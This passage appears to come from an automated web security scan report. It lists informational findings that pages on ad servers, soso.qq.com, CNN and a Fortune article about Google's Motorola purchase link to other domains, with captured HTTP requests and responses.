Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; _curtime=1313432705; pubfreq_25281=243-1; pubfreq_28134=243-1; PUBMDCID=1; pubfreq_25281_19972_333766901=661-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES; KRTBCOOKIE_148=1699-uid:429524AE883F3F4E0C1F6D2B02EBB920; KRTBCOOKIE_16=226-uid:3574436734868397339; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 2301
Date: Mon, 15 Aug 2011 18:41:37 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:41:36 GMT; path=/
Set-Cookie: _curtime=1313433697; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:51:37 GMT; path=/
Set-Cookie: pubfreq_28134_23480_1567451806=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:21:37 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:41:37 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=uWIAAOZtAAC4WwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&cost=1.3871&mapped_uid=7-125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF&us_id=1209&creative_id=130695&campaign_id=61138&source_url=http%3A%2F%2Fimdb.com&exch_id=7&auction_id=FDC12539-932F-47D2-BE7C-D7D90316F804&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Famzn.us.house.redirect%2F%3Bcid%3Dpubmatic728%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbes-clck.com%2Fc%3Fi%3D1%24AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1v&line_item_id=728904&invite_uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1&zip_code=75207"></iframe>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=Entertainment_and_Leisure" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

13.36. http://soso.qq.com/news.q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://soso.qq.com
Path:   /news.q

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /news.q?_=1313432881038 HTTP/1.1
Host: soso.qq.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?cf=web&ch=web.cf.news&pid=web.cf&ie=utf-8&w=xss&sd=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:27:28 GMT
Server: Apache
Location: http://jump.soso.com/newsjump.q?_=1313432881038
Cache-Control: max-age=0
Expires: Mon, 15 Aug 2011 18:27:28 GMT
Vary: Accept-Encoding
Content-Length: 231
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://jump.soso.com/newsjump.q?_=1313432881038">here</a>
...[SNIP]...

13.37. http://soso.qq.com/news.q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://soso.qq.com
Path:   /news.q

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /news.q?_=1313433375207 HTTP/1.1
Host: soso.qq.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?w=xss&pid=n.res.time.m&ty=c&sd=3&st=r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:35:20 GMT
Server: Apache
Location: http://jump.soso.com/newsjump.q?_=1313433375207
Cache-Control: max-age=0
Expires: Mon, 15 Aug 2011 18:35:20 GMT
Vary: Accept-Encoding
Content-Length: 231
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://jump.soso.com/newsjump.q?_=1313433375207">here</a>
...[SNIP]...

13.38. http://streamate.doublepimp.com/r.poptracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://streamate.doublepimp.com
Path:   /r.poptracking

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /r.poptracking?pcid=e0cac655-b276-43e0-a649-96531bf856de&eventid=3&aid=20003&offerid=1363&poolid=116&publisherid=20151&siteid=20151&country=US&qsurl=http%3a%2f%2fwww.xhamstercams.com%2fexports%2fgolive%2f%3fAFNO%3d1-0-624213-344279%26UHNSMTY%3d458%26DF%3d0%26lp%3d3&h=&firstdelivery=False HTTP/1.1
Host: streamate.doublepimp.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:55:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR IND"
Set-Cookie: __rtso=1363|2|8/15/2011 11:56:23 AM|42ca7cce-320c-4d84-a796-45706558fe1d; expires=Wed, 14 Sep 2011 11:55:38 GMT; path=/
Set-Cookie: __rtsv=20003_1363_116_20151_0_0_0_0_59241cb1-5c81-42fc-8bfe-86dce249f60c_50.23.123.106_--_8/15/2011 11:55:38 AM_CPM_1.0000_1.0000_20151; expires=Wed, 14 Sep 2011 11:55:38 GMT; path=/
Set-Cookie: __rtsp=116|2|8/15/2011 11:55:38 AM|False; expires=Wed, 14 Sep 2011 11:55:38 GMT; path=/
Location: http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&UHNSMTY=458&DF=0&lp=3
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 217

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&amp;UHNSMTY=458&amp;DF=0&amp;lp=3">here</a>.</h2>
...[SNIP]...

13.39. http://svcs.cnn.com/weather/getForecast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://svcs.cnn.com
Path:   /weather/getForecast

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /weather/getForecast?time=46&mode=json_html&zipCode=31041&locCode=09GA&celcius=false&csiID=csi3 HTTP/1.1
Host: svcs.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:12 GMT
Server: Apache
Content-type: text/html
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=900
Expires: Mon, 15 Aug 2011 18:53:51 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 17092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head><script type="text/javascript">var cnnDocDomain=''; if(location.hostname.indexOf('cnn.com')>0) { cnnDocDomain='cnn.com'; }
...[SNIP]...
</script>
                   <script src="http://i.cdn.turner.com/cnn/.element/js/3.0/csi_include.js" type="text/javascript"></script>
...[SNIP]...

13.40. http://syndication.exoclick.com/ads-iframe-display.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.exoclick.com
Path:   /ads-iframe-display.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ads-iframe-display.php?type=945x100&login=xhamster&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=&text_only=0&show_thumb=&idzone=147655&idsite=34954&p=http://www.xhamster.com&dt=1313434755118 HTTP/1.1
Host: syndication.exoclick.com
Proxy-Connection: keep-alive
Referer: http://custom.exoclick.com/xhamster-945x100.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 15 Aug 2011 18:58:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 285

<html>
<body style="margin: 0px; background-color: #FFFFFF; font-family: Verdana, Arial;">
<body style="margin: 0px;">
<iframe src="http://ifa.xhamstercams.com/dif/?cid=945x100" align="middle" width="945" height="100" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

13.41. http://syndication.exoclick.com/ads-iframe-display.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.exoclick.com
Path:   /ads-iframe-display.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ads-iframe-display.php?type=945x100&login=xhamster&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=&text_only=0&show_thumb=&idzone=147655&idsite=34954&p=http://www.xhamster.com&dt=1313434612256 HTTP/1.1
Host: syndication.exoclick.com
Proxy-Connection: keep-alive
Referer: http://custom.exoclick.com/xhamster-945x100.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 15 Aug 2011 18:55:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 288

<html>
<body style="margin: 0px; background-color: #FFFFFF; font-family: Verdana, Arial;">
<body style="margin: 0px;">
<iframe src="http://feeds.videosz.com/spots/index.php?sid=41" align="middle" width="945" height="100" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

13.42. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tech.fortune.cnn.com
Path:   /2011/08/15/is-google-buying-motorola-for-its-17000-patents/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011/08/15/is-google-buying-motorola-for-its-17000-patents/?hpt=hp_t2 HTTP/1.1
Host: tech.fortune.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=cnn-adbp-domestic%3D%2526pid%253Dcnn%25253Ain%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fhpt%25253Dhp_t2%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:45:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 18:42:08 +0000
Cache-Control: max-age=78, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://tech.fortune.cnn.com/xmlrpc.php
Link: <http://wp.me/pzwtX-ho8>; rel=shortlink
X-nananana: Batcache
Content-Length: 55624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<!--
   generated 222 seconds ago
   generated in 0.232
...[SNIP]...
<meta property="fb:page_id" content="139321929435426"/>
<link rel="profile" href="http://gmpg.org/xfn/11" />
   <link rel="shortcut icon" href="http://i.cdn.turner.com/money/.element/img/5.0/fortune/icons/favicon.ico" />
<link rel="pingback" href="http://tech.fortune.cnn.com/xmlrpc.php" />
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/ssi/css/2.0/pkg/cnnmoney.blog/latest.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.main/latest.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>-->


<link rel="stylesheet" type="text/css" media="all" href="http://s1.wp.com/wp-content/themes/vip/cnnmoneybasic2/style.css?m=1308950358g" />
<script type="text/javascript">
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache-01.cleanprint.net/cp/ccg?divId=2435&ps=427' name='cleanprintloader'></script>
       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=tech.fortune.cnn.com&amp;id=8466345&amp;t=1313433728&amp;back=tech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F%3Fhpt%3Dhp_t2' type="text/javascript"></script>
...[SNIP]...
</script>
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1313010128g" type="text/css" />
<link rel='stylesheet' id='post-reactions-css' href='http://s2.wp.com/wp-content/mu-plugins/post-react-2/style.css?m=1313420638g&#038;ver=2' type='text/css' media='all' />
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1308950269g&amp;ver=1.6.1'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://fortunebrainstormtech.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://fortunebrainstormtech.wordpress.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Fortune Tech: Technology blogs, news and analysis from Fortune Magazine' href='http://tech.fortune.cnn.com/' />
...[SNIP]...
<link rel='canonical' href='http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/' />
<link rel='shortlink' href='http://wp.me/pzwtX-ho8' />
<link rel="alternate" type="application/json+oembed" href="http://public-api.wordpress.com/oembed/1.0/?format=json&url=http%3A%2F%2Ftech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F&for=wpcom-auto-discovery" /><link rel="alternate" type="application/xml+oembed" href="http://public-api.wordpress.com/oembed/1.0/?format=xml&url=http%3A%2F%2Ftech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F&for=wpcom-auto-discovery" /><link rel='openid.server' href='http://fortunebrainstormtech.wordpress.com/?openidserver=1' />
<link rel='openid.delegate' href='http://fortunebrainstormtech.wordpress.com/' />
<link rel="search" type="application/opensearchdescription+xml" href="http://tech.fortune.cnn.com/osd.xml" title="Fortune Tech: Technology blogs, news and analysis from Fortune Magazine" />
<link rel="search" type="application/opensearchdescription+xml" href="http://wordpress.com/opensearch.xml" title="WordPress.com" />
   <style type="text/css">
...[SNIP]...
<div id="cnnHeader" class="moneyTechNav">
       <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
<a href="http://money.cnn.com/"><img src="http://i2.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_mainnav.gif" width="218" height="67" alt="CNNMoney" title="CNNMoney" class="img-logo" /></a>
...[SNIP]...
<li id="mm-share-twitter"><a href="http://twitter.com/cnnmoney" target="new"><img src="http://i.cdn.turner.com/money/.element/img/5.0/misc/social_nav_t.gif" height="20" width="20"></a></li>
       <li id="mm-like-facebook">
           <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=27" scrolling="no" frameborder="0" allowTransparency="true"></iframe>
...[SNIP]...
<li><a href="http://cnnmoneytech.tumblr.com/">Tech&nbsp;Tumblr</a>
...[SNIP]...
<p><a href="http://fortunebrainstormtech.files.wordpress.com/2011/08/motogoogle.png"><img class="alignright size-full wp-image-66851" title="Motogoogle" src="http://fortunebrainstormtech.files.wordpress.com/2011/08/motogoogle.png?w=268&#038;h=326" alt="" width="268" height="326" /></a>
...[SNIP]...
</a>) <a href="http://googleblog.blogspot.com/2011/08/supercharging-android-google-to-acquire.html">announcement</a>
...[SNIP]...
nts important to the delivery of competitive products in the marketplace, video particularly compression, decompression and security technologies and finally, a leading position in 4G LTE essential." (<a href="http://fosspatents.blogspot.com/2011/08/motorola-doesnt-have-license-to-kill.html">link</a>
...[SNIP]...
ontrast, the values of telecom patents like the ones Motorola owns are rising faster than gold, and Google -- whose portfolio is particularly lacking -- needs them desperately. As Larry Page put it on <a href="http://googleblog.blogspot.com/2011/08/supercharging-android-google-to-acquire.html">Google's official blog</a>
...[SNIP]...
<em><a href="http://blogs.wsj.com/deals/2011/08/15/has-google-motorola-crushed-another-deal/?mod=yahoo_hs">Wall Street Journal</a>
...[SNIP]...
<em><a href="http://blogs.wsj.com/deals/2011/08/15/google-motorola-its-all-about-the-patents/?mod=yahoo_hs">Journal</a>
...[SNIP]...
<div class="boxHeading"><a href="http://twitter.com/philiped" target="new">Follow Philip Elmer-DeWitt</a>
...[SNIP]...
<div class="vcard">
       <img src="http://i2.cdn.turner.com/money/.element/img/1.0/sections/blogs/fortunebrainstormtech/philip_elmer_dewitt2_130.jpg" border="0" height="130" width="130" alt="Philip Elmer-Dewitt" class="photo" />
       <div class="fn">
...[SNIP]...
<div class="cnnHeadline"><a href="http://gettermsheet.com">The Term Sheet</a>
...[SNIP]...
<p> Receive Fortune's newsletter on all the deals that matter, from Wall Street to Sand Hill Road.
           <a href="http://gettermsheet.com">SUBSCRIBE</a>
...[SNIP]...
<a href="/magazines/fortune/fortune_archive/2011/08/15/toc.html" class="summaryImg"><img border="0" src="http://i2.cdn.turner.com/money/2011/images/07/28/fortune_20110815_150.jpg" alt="What happened at Pfizer" width="150" height="196"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/site/fo-dnr0910.html?link=1002993" target="_blank">Give the gift of Fortune</a>
...[SNIP]...
<li><a href="http://itunes.apple.com/us/app/fortune-magazine/id382920959?mt=8#" target="_blank">Get the Fortune app</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/site/fo-nb3term1010.html?link=1002984" target="_blank">Subscribe</a>
...[SNIP]...
<div class="cnnlogo"> <img src="http://i2.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_footer.gif" alt="CNNMoney.com" title="CNNMoney.com" /> </div>
...[SNIP]...
<li><a rel="nofollow" target="new" href="http://www.cnnmoneymediakit.com">Advertise with Us</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecareeropportunities.com">Career Opportunities</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortuneconferences.com">Conferences</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecouncil.com">Business Leader Council</a>
...[SNIP]...
<li id="footer_maglinkF"><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1002982.html">Subscribe to Fortune</a>
...[SNIP]...
<li id="footer_maglinkM"><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003748.html">Subscribe to Money</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1003749.html">Give the Gift of Fortune</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003746.html">Give the Gift of Money</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunereprints.com">Reprints</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.timeincnewsgroupcustompub.com/">Special Sections</a>
...[SNIP]...
<li><a target="new" href="http://facebook.com/cnnmoney">Facebook</a>
...[SNIP]...
<li><a target="new" href="http://twitter.com/cnnmoney">Twitter</a>
...[SNIP]...
<li><a target="new" href="http://www.youtube.com/CNNMoney">YouTube</a>
...[SNIP]...
<li><a href="http://cnnmoneytech.tumblr.com/">Tumblr</a>
...[SNIP]...
<a href="/services/advertise/adchoices.html"> Ad choices <img src="http://i2.cdn.turner.com/money/.element/img/1.0/services/advertise/adchoiceslogo_footer.png" width="12" height="12" /></a>
...[SNIP]...
<!-- omniture & biztracking must be called separately -->    <script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
<!--BIZO Page TAG-->
   <img src="http://www.bizographics.com/collect/?fmt=gif&pid=311" style="display:none;" width="1" height="1" border="0" alt="">
   <!--/BIZO Page TAG-->
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
   <a href="http://www.quantcast.com/p-5dyPa639IrgIw" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-5dyPa639IrgIw.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.blog/latest.js"></script>    </div>
   <img src="http://i.cdn.turner.com/money/.element/img/1.0/misc/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)">
   
<div class="wpcopyright">Powered by <a href="http://wordpress.com/vip-hosting/" rel="generator">WordPress.com VIP</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
